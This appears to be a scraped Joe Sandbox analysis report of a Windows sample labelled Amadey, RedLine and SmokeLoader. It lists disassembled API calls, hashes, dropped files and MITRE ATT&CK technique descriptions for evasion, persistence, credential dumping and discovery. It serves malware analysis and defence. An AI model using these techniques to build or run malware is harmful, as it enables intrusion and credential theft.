GetLastError.KERNEL32(?,011C5E17,011A4B80,00000001,011A4B80,011A4B80,?,011C18EE,00000000,?,011A4B80,00000000,011A4B80,?,011C1E42,011A4B80), ref: 011C67E2

Part of subcall function 011C67A8: CloseHandle.KERNEL32(FFFFFFFE,011C67F2,?,011C5E17,011A4B80,00000001,011A4B80,011A4B80,?,011C18EE,00000000,?,011A4B80,00000000,011A4B80), ref: 011C67B8

___initconout.LIBCMT ref: 011C67F2

Part of subcall function 011C676A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,011C6799,011C5E04,011A4B80,?,011C18EE,00000000,?,011A4B80,00000000), ref: 011C677D

WriteConsoleW.KERNEL32(011A4B80,00000000,011D4788,00000000,?,011C5E17,011A4B80,00000001,011A4B80,011A4B80,?,011C18EE,00000000,?,011A4B80,00000000), ref: 011C6807

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 628f873d9dac18ea78600df74b30d6553827fab5b6fa45350afa478c917e2dfc
Instruction ID: 0a75c6a7843a1dc8a6d137da2bc7cdc01bb55a5b4cc392a2546d962cca032bf3
Opcode Fuzzy Hash: 628f873d9dac18ea78600df74b30d6553827fab5b6fa45350afa478c917e2dfc
Instruction Fuzzy Hash: 89F01236001115BFCF2A1FD9EC049CA3F65FB146A1B104428FE2885210D732C961DB90

Uniqueness

Uniqueness Score: -1.00%

Function 011B4EF4 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,011B4E91,00000064), ref: 011B4F17
LeaveCriticalSection.KERNEL32(011D7738,011D84A0,?,011B4E91,00000064,?,76686490,?,011A3AA7,011D84A0), ref: 011B4F21
WaitForSingleObjectEx.KERNEL32(011D84A0,00000000,?,011B4E91,00000064,?,76686490,?,011A3AA7,011D84A0), ref: 011B4F32
EnterCriticalSection.KERNEL32(011D7738,?,011B4E91,00000064,?,76686490,?,011A3AA7,011D84A0), ref: 011B4F39

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: d35825768a0aadac28009a0e2a39353093e93ede81254e095e454fde84de3943
Instruction ID: cb49f9da628cfc5655e718ecb1961452ed2bc81aff7cfbabcad757ccfc11383c
Opcode Fuzzy Hash: d35825768a0aadac28009a0e2a39353093e93ede81254e095e454fde84de3943
Instruction Fuzzy Hash: F0E09231643524ABCA2D2BD5FC4EAC97F16EB15A55B024434F52566144CB6028808BD1

Uniqueness

Uniqueness Score: -1.00%

Function 011B9C40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, xrefs: 011B9C83, 011B9C8A, 011B9CC0

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
API String ID: 0-2518443555
Opcode ID: 6a052b78564140bccb07bef4680efc883ed019e244809e2982defdf0dd6cb2f6
Instruction ID: 74e53bcbfb4072545de69f4b0acbc6cc544d7c334df2d6684766ca871475d173
Opcode Fuzzy Hash: 6a052b78564140bccb07bef4680efc883ed019e244809e2982defdf0dd6cb2f6
Instruction Fuzzy Hash: 7841AAB1A05659AFDB2DDF5EC8C09EEBBF8EF85708F100066E605D7250D7709A42C751

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report q4B165cujP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Threatname: SmokeLoader

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\h1931339.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\k4215493.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\j8994074.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n7660022.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ohcompetitive.exe.log

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Windows Analysis Report
q4B165cujP.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre